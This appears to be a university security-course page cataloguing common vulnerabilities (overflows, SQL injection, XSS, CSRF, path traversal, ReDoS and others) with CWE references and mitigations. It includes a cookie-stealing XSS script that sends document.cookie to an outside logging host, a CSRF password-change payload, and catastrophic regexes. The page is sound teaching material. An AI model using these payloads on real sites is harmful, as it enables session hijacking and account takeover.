Vulnerability of the Day


Vulnerability of the Day is an open source project started by Prof. Meneely and is in use by several universities. Check us out on GitHub – pull-requests welcome!


Integer Overflow

Description

  • CWE-190: Integer Overflow or Wraparound
  • CWE-680: Integer Overflow to Buffer Overflow

Examples

Mitigations

  • Check the size of your integers, considering what would happen if it wrapped around.
  • Watch the casting – don’t just ignore those compiler warnings!
  • Libraries such as SafeInt or BigInteger might be more suitable if the problem is very complex.

Notes

  • A wraparound combined with a malloc operation can result in a zero-sized buffer being allocated, leading to a zero-byte buffer, which will always be overflowed.
  • In practice, most integer wraparounds come from improper casting, not as much from mathematical operations.
  • It’s impractical to always check every integer for wraparound after every operation, but keep this as a consideration in sensitive situations.
  • Trivia: Psy YouTube; Deep Impact
  • Comic: XKCD-571

Buffer Overflow

Description

Examples

Mitigations

  • Keep track of your array sizes.
  • Check the size of your buffer as it is inputted. For example, if you use scanf the format string can specify the max length, such as %3s instead of %s.
  • In the case of C, use functions like strncpy() instead of strcpy() that force you to specify your lengths.
  • Avoid functions like gets() that don’t check the input size.

Notes

  • Buffer overflows have been very common for a long time.
  • If you are clever enough, you can override the return pointer on the stack frame so that your own code is then executed.
  • Languages that enforce array lengths are not susceptible to this classic form (e.g. Java).
  • Merely turning on the stack protector is not enough. We could easily craft an exploit that stays within the stack frame. (In our example, turning on the stack protector doesn’t fix the “Gotcha!” exploit.)
  • Comic: XKCD-1354 – the infamous Heartbleed vulnerability in OpenSSL leveraged buffer overflow to expose arbitrary data from memory.

SQL Injection

Description

Examples

Mitigations

  • The only acceptable mitigation is properly-used prepared statements (with binding variables). These API calls are supported by all SQL standards and separate the logic of the query from its input entirely (i.e. pre-compile the SQL). No string concatenation should be used. Key: don’t allow any possibility to let user input turn into executable code.
  • Escaping characters has proven to be a poor substitute, as changing character sets makes this a moving target and quite difficult.
  • Using an OO-relational mapper (e.g. Hibernate) can mitigate this. However, string concatenation on the Hibernate query language can result in basically the same thing.

Notes

  • Ranked #6 on the CWE Top 25 vulnerabilities for 2020. Very common today.
  • Can be done in pretty much all languages that can execute SQL: Java, Ruby, PHP, etc.
  • Not particularly hard to find or fix, you just have to know about it.
  • A lot of people will tell you that you need lots of tools to fix SQL injection. It’s all snakeoil – just use prepared statements.
  • Ars Technica has a very nice writeup on the history and consequences of SQL injection.
  • Comic: XKCD-327

Cross-Site Scripting (XSS)

Description

  • CWE-79: Cross-Site Scripting

Examples

  • Use DVWA (see XAMPP installation as described in the web applications activity).

Mitigations

  • Defense in depth: Perform thorough input validation. Accept only “known good”; use a white list of acceptable inputs.
  • Converting HTML characters to their escaped form (e.g. < to &lt;) is the safest approach. Only allowing some input is a good idea, but sometimes you want certain characters to be allowed and escaping allows for that flexibility.
  • However! Knowing which characters to escape is very tricky. I strongly recommend using an external library, and not just rolling your own. Check out how complicated it is at OWASP’s XSS Cheat Sheet.
  • Use a library for handling this kind of thing. Understand how this library works (is it regexes, parsing to HTML, etc?). Follow the problems this library has fixed. A great example of a library that mitigates XSS for Ruby on Rails is the sanitize gem.

Notes

  • Widely considered among the most dangerous vulnerabilities today. XSS vulnerabilities have affected GMail, Twitter, Facebook, Hotmail, Yahoo Mail, and just about every other major web application out there.

  • Executing Javascript on another person’s machine can result in a vast number of exploits. In every case, the asset of cross-site scripting is the user interface. The two main exploits of XSS are:

    • session hijacking, where you steal the authentication token from the victim’s cookie and use it to log in. For example:
      <script>
      x = new XMLHttpRequest();
      x.open("GET", "http://requestb.in/13x2ec31?s=" + document.cookie, true);
      x.send();
      </script>
      

      This is a silent AJAX call to a remote site, which an attacker then monitors anonymously, stealing your authentication token. Having the authentication token gives the attacker the ability to log in as the victim (as long as they stay logged in). From there, the attacker can can reset passwords, set up other accounts, set up permanent scripts, anything.

    • web defacement, where you can modify the page to have an extra form asking for someone’s password, which gets sent off to a remote site. A user would not be able to tell that they just sent their password to a malicious site.
  • A good discussion of XSS, including some fascinating historical exploits, is on the Ruby on Rails security page.

  • Note that XSS does not always have to be done inside <script> tags, it can be done in CSS injection, inside image metadata, and in many other situations. There’s even DOM-based SQL injection, with its own massive cheat sheet.

  • Try this exploit on the XSS Reflected page in DVWA. ;)

    <canvas id=c><script>C=c.getContext('2d');f=C.fillRect.bind(C);
    S=[-1,I=J=0];A=B=210;X=Y=1;
    function g(n){++S[n];N=Math.random(M=n*613+9)*471}D=document;
    D.onkeydown=D.onkeyup=function(e){d=!!e.type[5];k=e.keyCode;
    k&1?I=k&16?d:-d:J=k&4?-d:d};
    g(0);setInterval(function(){A-=A<I|A>420+I?0:I;
    B-=B<J|B>420+J?0:J;
    M+=X;N+=Y;
    N<0|N>471?Y=-Y:0;
    M==622&N>B&N<B+51|M==9&N>A&N<A+51?X=-X:M>630?g(0):M||g(1);
    f(0,0,c.width=640,c.height=480);
    C.fillStyle='tan';C.font='4em x';C.fillText(S,280,60);
    f(0,A,9,60);f(631,B,9,60);f(M,N,9,9)},6)</script>
    </canvas>
    

Cross-Site Request Forgery (CSRF)

Description

  • CWE-352: Cross-Site Request Forgery
  • Another good description.
  • Essentially, when an HTTP GET request makes a persistent modification, then you can get users to make changes to other websites they are already authenticated into.

Examples

  • Use DVWA (see XAMPP installation as described in the web applications activity).
  • An example exploit would be getting a user to load an HTML page with this image:
    <img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#">
    

Mitigations

  • As a rule, don’t allow GET actions to perform persistent modifications to the website.
  • If a GET does still need to make a modification, then require authentication within that HTTP request (see DVWA as an example).
  • Session tokens should not be allowed in URLs, only in cookies.
  • Many web application frameworks (e.g. Rails) will produce a CSRF token with forms. These are random numbers that the server provides to presented forms, and expect before processing any POST requests. However, these can be circumvented when other situations such as XSS are possible.

Notes

  • Technically, this is not cross-site scripting as no script is being executed on user’s browser. However, CSRFs allow attackers to fool victims into sending GET requests to malicious sites or by modifying something in the app itself.
  • CSRF is one reason that many email clients don’t show images upon initially showing an email.

OS Command Injection

Description

  • CWE-78: OS Command Injection

Examples

Mitigations

  • Generally speaking, be very careful with using these generic “run in the OS” calls. Avoid, if possible. Usually, APIs exist for specific OS calls that can accomplish the same thing without the danger of injection.
  • Many languages allow limiting an OS call to a single command, which can limit the injection.
  • Only allow certain input to these commands, as opposed to blocking or escaping bad output.

Notes

  • Web application technologies like PHP and Ruby on Rails make these OS calls very easy these days. These are very dangerous, as getting access to the underlying web server can have a huge impact.
  • It’s tempting to think you can just use a quick grep function or call a separate script, but be sure to think twice about that interaction.

Path Traversal

Description

Examples

  • Demo: path-traversal.zip.
  • CVE-2009-2902. An issue in Tomcat where they allowed web applications to be named ...war, which could be used for arbitrary file deletion outside of the webapp sandbox.

Mitigations

  • Remember that path strings are very flexible – they can be relative or absolute. So a/b/c.txt is the same as a/b/../b/c.txt. The canonical form of any file is just the absolute path name, e.g. /home/someone/a.txt.
  • Better to leave the canonicalization to the programming language. Java uses getCanonicalPath(), it’s called realpath() in C, PHP, and Perl. They actually ping the filesystem to interpret the path string.
  • Tactic: canonicalize your sandboxed directory, canonicalize the final filename you are about to open, and compare the two with startsWith.

Notes

  • Another one that’s common to web applications especially. This often appears in PHP apps that delegate code to the operating system, or use flat file storage.
  • Akin to SQL Injection where it’s string concatenation gone wrong. Sadly, there’s no version of a prepared statement for files (e.g. set the directory separately from the file name), so new File(sandbox, filename) is still vulnerable to this.
  • The myriad of exploits for this one over the years has shown that blacklisting is not a good approach. Better to just convert to absolute, and check the directory from there.
  • Can also be a danger with configuration files. In the interest of defense in depth, it might be wise to do this kind of check when a properties file contains the name of another file.
  • Trivia: Using .. in URL directory indexing to access any file on the webserver is called “slash-dotting”, which is why the news site slashdot.org is called slashdot.org.

Log Overflow

Description

  • Log overflow vulnerabilities fall under CWE-400: Uncontrolled Resource Consumption.
  • CWE-779 and CWE-770 are also related.
  • Printing out to a console or logger usually ends up in a text file. If an attacker knows this, and the logging is unrestricted, then attackers can fill up the log file and crash the machine by filling up the hard drive. This is a denial of service attack that is particularly difficult to recover from. Plus, weird things happen when the entire hard drive is completely out of bytes, so attackers can take advantage of this.

Examples

  • Demo: log-overflow.zip.
  • CVE-2013-0231. A driver was flooding the Linux kernel with messages, which got logged and filled up the harddrive. The fix was to limit the rate at which the driver could print errors.

Mitigations

  • Use a logging library (e.g. log4j). In configuring your logger, be sure to use rolling log files. These can be rotated on a daily basis, or by size.
  • Be sure to actually test this functionality yourself.

Notes

  • Mostly an issue in applications that run on servers, although desktop clients are not immune to this.
  • The disadvantage of this mitigation is that you can potentially lose your logs if they get over-rotated. Attackers can potentially take advantage of this fact by intentionally overflowing the logs to erase the evidence. But other protections, like request limits, can mitigate that problem too.
  • As a general rule, avoid unlimited hard drive storage (e.g. uploading photos). Sometimes it’s easier to just store images as BLOBS in a database (where the table sizes are often limited by default), as opposed to dealing with the OS directly.

XML Embedded DTDs

Description

  • See CWE-827 for the general case, and then the specific vulnerabilities are CWE-776 and CWE-611.
  • XML allows for validation of their input using Document Type Definitions (DTDs). These DTDs are pretty flexible, and allow for things like reading in external files. However, users can embed their own DTDs in the header of an XML file, thereby accessing the file system directly.

Examples

Mitigations

  • In most languages, you can disable validation of embedded DTDs with ease.
  • However, make sure you test this closely, as Java’s built-in SAX parser does not always respect setValidating(false) and setExpandEntityReferences(false) depending on the environment. In that case, you need to override the entity resolver (see the given example).

Notes

  • Ironically, DTDs were originally intended for XML validation, but it got warped into more of a user convenience. So yes, fixing this vulnerability means turning off “validation”.
  • A similar vulnerability is the XML bomb, which expands XML entities expoentially (causing a DoS by filling up the memory). However, most XML parsers have limiting defaults for expanding XML entities, so that XML bombs are (practically speaking) no longer an issue as long as developers don’t explicitly turn off the limits. An example XML bomb is included in the above zip.

Hardcoded Credentials

Description

  • CWE-798: Use of Hard-Coded Credentials

Examples

  • Demo: hardcoded-credentials.zip.
  • 2016 Uber Data Breach – an Uber developer accidentally pushed hardcoded Amazon AWS credentials to GitHub, allowing hackers to gain access to names, emails, and phone numbers for 57 million users and 600,000 driver’s license images.

Mitigations

  • Extract your credentials out to a properties file, then install your system with the proper permissions on that properties file.
  • Corollary: don’t include default passwords anyway, make the user define them upon installation.

Notes

  • Believe it or not, this is another common problem. It’s a common misconception that you can keep secrets in your source code.
  • Same kind of concept applies to encryption keys, or pseudo-random number generator seeds.
  • Obfuscation isn’t the answer because reverse engineering is easier than you think. (Takes time and some skill, which crowds have).
  • License keys have had this problem. Many companies today resort to a remote authentication for license products. But even then, it’s still a tough problem today for desktop client applications (e.g. Windows Genuine Advantage).
  • Hardcoding credentials also breaks maintainability and deployability. What if your database password was guessed, and you had to change it?
  • Don’t push your Slack token to GitHub!

Time of Check, Time of Use (TOCTOU)

Description

Examples

  • The L1 Terminal Fault vulnerability involved TOCTOU and allowed attackers to violate hyperthreading.
  • PHP had a TOCTOU vulnerability related to their shutdown function and memory_limit functionality in CVE-2004-0594. See the fix for better details.
  • This has also occurred in installation scripts, such as Debian’s checkinstall in CVE-2008-2958. See the original bug report.

Mitigations

  • When possible, try to make transactions as atomic as possible. If the technology provides a way to check and change in a single transaction, do it. But this is not always possible.
  • To make exploits harder, minimize the time between checking and using.
  • Limit the number of processes that can access a single file (or other resource without much concurrency checking).
  • Recheck the resource for integrity after using it.

Notes

  • Sometimes this cannot ever be fully mitigated, depending on the technology and situation.
  • This vulnerability is typically a concurrency issue, so all of best design practices of concurrency apply here.

Lack of Log Neutralization

Description

  • CWE-117: Improper Output Neutralization for Logs
  • If you allow newlines in your logs, then attackers can forge log entries, throwing investigations off.
  • Related to generalized CRLF Injection CWE-93.

Examples

Mitigations

  • Don’t allow newlines in your logs - remove them entirely.
  • Depending on what tools are used to analyze logs, the CRLF character might not be enough. Consider <br> if you can view logs online, too.
  • Don’t forget to log the situation where a newline is injected, too.

Notes

  • This is one vulnerability that is explicitly a repudiation threat.
  • By itself, this is pretty innocuous. In conjunction with other attacks, an attacker can provide misinformation in the logs that throws off the post-exploit investigation.
  • Developers who have access to previous logs (or similar logs) can easily guess or reverse-engineer your patterns, making the result indistinguishable. Take a look at CAPEC attack pattern 93.
  • Oddly enough, common logging libraries like java.util.logging and log4j don’t have an option to remove newlines.

Hashing Without Salt

Description

  • CWE-759: Use of a One-Way Hash without a Salt
  • If an attacker breaks in to a system that provides authentication, they should not be able to access the passwords. Historically, people would hash (digest) algorithms to accomplish this. However, commonly-guessed passwords are still vulnerable, as attackers can make “rainbow tables”, or digests of common passwords.

Examples

  • Demo: hashing-salt.zip – The given example is an authentication example that demonstrates the different ways you can store a password and still authenticate. User sets their password, which gets salted and then digested (hashed). Every time the user authenticates, the system then salts and digests the password, and checks the results.

Mitigations

  • Append a secret “salt” string that only the server knows before digesting. This will make those digests unrecognizable.
  • Make sure that the salt is set by the final user, not hardcoded or set by default. Server salt is like default passwords or PRNG seeds - secrets that users should set by default.

Notes

  • Don’t ever store passwords in plain text. This means that your “reset password” feature, should never email passwords in plaintext (because you don’t have that anymore!). If you ever notice a website that does this, they are not hashing their passwords.
  • Don’t make your salt easily guessable. Any long string is fine, since you won’t need to remember again.

Insecure PRNG Algorithms

Description

  • CWE-338: Use of Weak PRNGs
  • Most pseudo-random number generators (PRNGs) are not designed to be secure, and with improper management can be easily guessed by a variety of methods.

Mitigations

  • Use PRNGs that are designed to be secure, e.g. java.util.SecureRandom instead of java.util.Random.

Notes

  • Insecure PRNGs are typically faster that secure ones
  • Reproducibility is favorable in some non-security applications, e.g. research simulations, procedurally-generated game states.

Poor/Lack of PRNG Seed Protection

Description

  • CWE-337: Predictable Seed in PRNG
  • If you are using PRNGs for security purposes (e.g. encryption keys, session tokens, unique tokens), don’t make those seeds easily guessable.

Examples

  • Demo: prng.zip – DeckDealer is a simplified example of a card shuffling class where the PRNG was seeded by the time, and an outside program could just create a database of possible seeds and check the results.
  • A famous example of this occurred in Debian distributions of OpenSSL, as described in depth here.

Mitigations

  • Don’t use predictable seeds, such as:
    • Seeds that are reset consistently. Re-seeding doesn’t make the PRNG any more secure (or “random”).
    • Millisecond time. In 100 years, there are only 3*10^12 milliseconds, which a botnet can easily enumerate through.
    • Nanosecond time. If attackers know roughly when you reset your seed, they can narrow down the space for guessing.
    • Process IDs. Even smaller space than millisecond time.
    • Anything else that can be guessed.
  • Instead, have the user set a secret token upon installation, and protect that secret token. Consider that token to be an asset, much like the salt for hashes.

Notes

  • The need for secure PRNGs arises in many different situations, such as cryptographic seeds, multi-factor authentication mechanisms, and session tokens. In most cases, a broken PRNG has devastating effects (e.g. predicting all future session tokens).
  • This is a different vulnerability than Insecure PRNG Algorithms. You need to mitigate both of these problems. Specifically:
    • What if I had an insecure algorithm, and an unprotected seed? BAD. You are vulnerable two different ways - people can reverse-engineer your seed, and just steal the seed.
    • What if I had an insecure algorithm, but a protected seed? BAD. Attackers can use math to reverse engineer the seed, or the next number. It’s harder to do, but when they get the seed it’ll be as if they stole it.
    • What if I had a secure algorithm, but an unprotected seed? BAD. Secure PRNGs still need seeds. The algorithm does not provide a method of supplying the seed. They are still deterministic - after all, they are still pseudo-random.
    • What if I had a secure algorithm, and a protected seed? GOOD. This is the ideal situation, regarding these two vulnerabilities. (You might be vulnerable other ways, of course. Say, to side-channel attacks.)

Java Reflection Abuse

Description

  • CWE-470: Unsafe Reflection
  • Despite what you might assume, Java allows you to access private variables in other classes via its Reflection API. In untrusted API situations (e.g. plug-in architectures), this can lead to malicious libraries accessing and tampering with sensitive data.

Examples

  • Demo: reflection-abuse.zip – Running make will result in the exploit, make safe results in running it under a security manager.
  • The ColdFusion database access API has this vulnerability (CVE-2004-2331).

Mitigations

  • Use the Java Security Manager to limit privileged API situations. While this feature is turned off by default, it’s actually critical for deploying a Java application securely (e.g. in a servlet container).

Notes

  • Many Java servers utilize a strict, security policy (e.g. Tomcat), however, many default installations of such servers do not force you to set up your security policy with the Java virtual machine.
  • The Java security manager blocks all kinds of other sensitive actions, such as System.exit(1);, file system access, or using reflection to instantiate singletons.
  • The Deployment & Distribution lecture covers more details on the Java Security Manager.
  • PHP also allows this kind of behavior, and third-party security manager libraries provide similar functionality as the Java Security Manager.

Cache Poisoning

Description

Examples

  • A very famous vulnerability (CVE-2008-1447) in BIND, a DNS protocol that runs at the heart of the internet, had a cache poisoning vulnerablitity that went undiscovered for decades until it was found and actively exploited in 2008. DNS maps names to IP addresses and uses a complex, multi-tiered form of caching throughout the internet’s root nodes. Attackers were able to cause certain domain names (Yahoo was one of them) to map to different servers on malicious IP addresses for some users, depending on your nearest DNS host.
  • A similar vulnerability in dnscache (CVE-2008-4392) attacked the “Start of Authority” requests. The reports show some relatively simple patches (this and this) that essentially do input validation and handle the boundary cases better.

Mitigations

  • If possible, don’t allow users to set their own cache expiration dates.
  • If possible, don’t allow users much control over caches to begin with.
  • As always, input validation helps, but it should not comprise the whole solution.
  • If you implement your own cache, be sure to put some extra checks in place for expiration dates and purging policies. Build the feature so that the expiration date is not set by the user, or at the very least validated to a specific range. If it’s worth the performance hit, periodically purge the cache regardless of expiration dates.

Notes

  • If your system’s assets are cached, then your cache becomes an asset. Consider this possibility in your risk analysis and planning for new features.
  • Historically, cache poisoning has most often applied to networking situations. The concept, however, is not specific to networking.
  • Cache poisoning can also occur in a web applications if the attacker can set HTTP headers. In particular, setting HTTP headers like Last-Modified can fool both the victim’s browser cache and server-side caches (e.g. Squid) into keeping exploits like XSS and CSRF cached for multiple requests. To mitigate this, never allow user data to be used in HTTP response headers.
  • In the security community, this is often considered more of an attack than a vulnerability, as often the mistake is not in the cache itself, it’s in the surrounding systems that employ the cache.

Uncontrolled Format String

Description

  • CWE-134: Use of Externally-Controlled Format String
  • In C, printing using printf(str) instead of printf("%s", str) results in the user being able to control the format string. This is especially egregious when you look at the %x and %n codes, which allow users to read and write arbirary bytes to arbitrary memory locations.

Examples

  • Demo: format-string.zip – Run make to see some interesting exploits. Also, be sure to check out what read-memory.rb does (requires make first).

Mitigations

  • Just use a format string!
  • Watch your compiler warnings, which look like: warning: format not a string literal and no format arguments.

Notes

  • The key that makes the %x code work is that printf is a “varargs” function. If you add more %x codes to the string, printf just starts reading memory locations from where it left off – right at the call stack.
  • This one is just as severe as buffer overflow, as it can allow arbitrary remote code execution.
  • Entire books have been written on elaborate exploits of format string vulnerabilities.

Compression Bombs

Description

  • CWE-409: Improper Handling of Highly Compressed Data
  • A great discussion from libpng.
  • Similar to an XML bomb, compression bombs are primarily used for denial of service attacks by filling up RAM or hard disk space. Minimally, this crashes the process and causes denial of service. Crashes, if handled poorly, however, can also cause other integrity problems (e.g. data corrpution), or confidentiality problems (e.g. core dumps).
  • What is more challenging about compression bombs is how ubiquitous compression is, and how hard this is to validate. If you are doing input validation, then you probably need to decompress first, so your decompression library is on the front lines of your attack surface.

Examples

Mitigations

  • Technically, a decompression library can mitigate this problem by keeping count of how many bytes have been decompressed and throwing an exception when it exceeds that limit (as is the mitigation with XML bombs). In practice, this feature often does not exist in decompression libraries (sadly). Look for such limits in the libraries that you use.
  • Avoid inputs where an arbitrary number of rounds of compression are allowed (e.g. this is possible with HTTP Headers).
  • Distrustful decomposition + strict system resource limits can mitigate this too. For example, a PNG file that gets server-side processing might want to do that processing in a separate process with tight memory consumption constraints. This adds complexity to your design too, and introduces concurrency complexities.

Notes

  • Compression is everywhere. HTTP Response headers can be compressed at the web server-to-browser level (unbeknownst to wep app developers). PNG and JPEG files are susceptible to bombing. MS Office documents are simply zip files of XML.
  • Testing for this is very easy – just create a bomb with blank data and compress it heavily. Some compression tools might prevent you from over-compressing, so look up the maximum ratios of your compression algorithms instead of just trusting the compression tool.
  • Due to the super-high ratios achieved by modern compression bombing, it is NOT a feasible approach to simply limit the the compressed input size. For example: 4.5PB compressed to 46MB.

Open Redirect

Description

Examples

  • Demo: open-redirect.zip – Using XAMPP, place this JSP page into the xampp-portable/tomcat/webapps/open-redirect/ and go to http://127.0.0.1:8080/open-redirect/open-redirect.jsp folder.
  • The popular bug tracking engine Trac had one of these, take a look at the fix.
  • Recently, Moodle, a popular learning management system, was also found to have had one of these, take a look at the fix.

Mitigations

  • Input validation, although more than just validating character strings – look up the URL itself. Make your whitelist a set of known, safe, URLs within your app. Only allowing input that redirects to your own site is also a big step.
  • Like file paths and path traversal vulnerabilities, URLs can get pretty complicated. Java has a normalize() method in the URI class that helps you canonicalize your URL before checking it. This is especially helpful if you are in an untrusted site situation (e.g. your webapp is hosted on the same site as untrusted webapps and you want to block intra-site redirects like ../evilsite).

Notes

  • While our example uses a form post, exploits more often occur in URL parameters (e.g. http://yourwebsite.com/somethingvulnerable.jsp?redirect=www.evilwebsite.com).
  • Detecting this one is the hard part. Most usages of redirects are when the URLs are not connected to user input (and are therefore safe). But, whenever user input eventually leads to a redirect, consider this issue.
  • This is a popular vulnerability used in phishing attacks (i.e. social engineering). Suppose PayPal had an open redirect vulnerability. Then an attacker could spam people asking them to check their paypal accounts. The URLs start with paypal.com, so most users would consider them safe and click through.

Dynamic Library Side-Loading

Description

  • CAPEC-159: Redirect Access to Libraries
  • CAPEC-641: DLL Side-Loading
  • We often rely on dynamicly linked libraries in our applications. Dynamic libraries can have their functions overridden.

Examples

Mitigations

  • Control how a user is allowed to run your executable. If a user has control over the way your code is executed (e.g. by setting their own environment variables, or controlling the build process), then this is becomes a risk.
  • Critical libraries can be statically linked and included within your packaged binary to prevent utilization of dynamic libraries. This is generally overboard and is not always necessary.
  • This kind of attack is often only possible after a compromise of the system that has given the attacker shell access, so ensure file and operating system permissions and other defenses are properly configured.

Notes

  • Dynamic libraries are available in every operating system, but they often go by different names. In Linux these Dynamic Libraries are called Shared Objects, in Windows Dynamic Link Library (DLL), in iOS they are Dynamic Libraries (Dylib).
  • There are legitimate uses for DLL Side-Loading including custom function implementations for profiling and overriding of malloc for customized memory allocation.
  • Some types of malware exploit this vulnerability by overriding common functions used by legitimate applications to cause them to carry out malicious acts. This helps to avoid some forms of malware detection as the legitimate applications are the ones carrying out the tasks.
  • Environment variables used for this attack include LD_PRELOAD on Linux, SYSTEMROOT on Windows, and DYLD_INSERT_LIBRARIES on macOS.

Regex Denial of Service (REDOS)

Description

  • Regular expressions can be written in such a way that determining if there is a match can take exponential time.
  • The key feature used is backtracking, where the regex works extra hard to try all possibiliites
  • OWASP Article does a great job explaining this, even with automata!

Examples

  • Try these out:
    • /^(a+)+$/
    • ([a-zA-Z]+)*
    • (a|aa)+
  • There are many historical examples of this happening over a long period of time. The Awesome ReDOS project tracks over real-world examples. Find your favorite tech!
  • See our repo for demo code

Mitigations

  • When writing your own regex’s, watch out for operators inside of operators (e.g. (a+)+ has a + twice), and those repetitions can overlap.
  • When DOS matters, don’t let people submit their own regular expressions if you can avoid it.
  • If you can’t avoid any of the above, at least provide a timeout handler, such as signal in Python or setTimeout() in Javascript.

Notes

  • Just about every programming language supports some form of regular expressions
  • Are you constructing a regex from user input? The (a|aa)+ example might be a good test case
  • Since regex’s are usually part of input validation, the mitigation “use input validation” does not apply here. As such, regex’s tend to be on the edge of the attack surface.